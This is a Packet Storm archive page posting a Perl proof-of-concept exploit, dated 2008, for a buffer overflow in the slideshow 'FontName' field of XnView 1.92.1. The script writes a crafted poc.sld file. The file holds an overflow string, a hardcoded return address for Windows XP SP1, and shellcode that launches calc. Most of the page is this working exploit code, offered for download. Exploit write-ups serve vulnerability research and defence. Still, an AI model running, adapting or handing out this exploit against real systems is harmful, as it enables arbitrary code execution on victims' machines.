exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

xnview1921-overflow.txt

xnview1921-overflow.txt
Posted Apr 3, 2008
Authored by haluznik

XnView version 1.92.1 Slideshow "FontName" buffer overflow exploit.

tags | exploit, overflow
SHA-256 | d231e3a018ad89ca7664a054729fab6dc5e52086d498367d68d84bf4ba079570

xnview1921-overflow.txt

Change Mirror Download
#!/usr/bin/perl

# ================================================================
# XnView 1.92.1 Slideshow "FontName" Buffer Overflow
# ================================================================
#
# Calc execution POC Exploit for WinXP SP1 pro English
#
# Found by : Stefan Cornelius, Secunia Research
# Advisory : http://secunia.com/secunia_research/2008-6/advisory
#
# Exploit by : haluznik | haluznik<at>gmail.com
#
# 04.01.2008 ..April Fools Day ;)
# ================================================================


print "\n [*] XnView 1.92.1 Slideshow exploit by haluznik\n\n";

my $head=
"\x23\x20\x53\x6c\x69\x64\x65\x20\x53\x68".
"\x6f\x77\x20\x53\x65\x71\x75\x65\x6e\x63".
"\x65\x0d\x0a\x46\x6f\x6e\x74\x4e\x61\x6d".
"\x65\x20\x3d\x20\x22";

$fontname = "A" x 32 . "\xcc\x59\xfb\x77";

my $shellcode=
"\x33\xc0\x50\x68\x63\x61\x6c\x63\x54\x5b".
"\x50\x53\xb9\x44\x80\xc2\x77\xff\xd1\x50".
"\xbb\xfd\x98\xe7\x77\xff\xd3";

my $tail=
"\x22\x0d\x0a\x22\x43\x3a\x5c\x74\x65\x73".
"\x74\x2e\x6a\x70\x67\x22\x0d\x0a";

$sld = $head . $fontname . $shellcode . $tail;

print " [+] Creating poc.sld file..\n";

open(file,">poc.sld") || die " [-] cannot write file\n";
print(file $sld);
close(file);
print " [*] Done!\n";

Login or Register to add favorites

File Archive:

December 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    0 Files
  • 2
    Dec 2nd
    41 Files
  • 3
    Dec 3rd
    25 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    0 Files
  • 6
    Dec 6th
    0 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close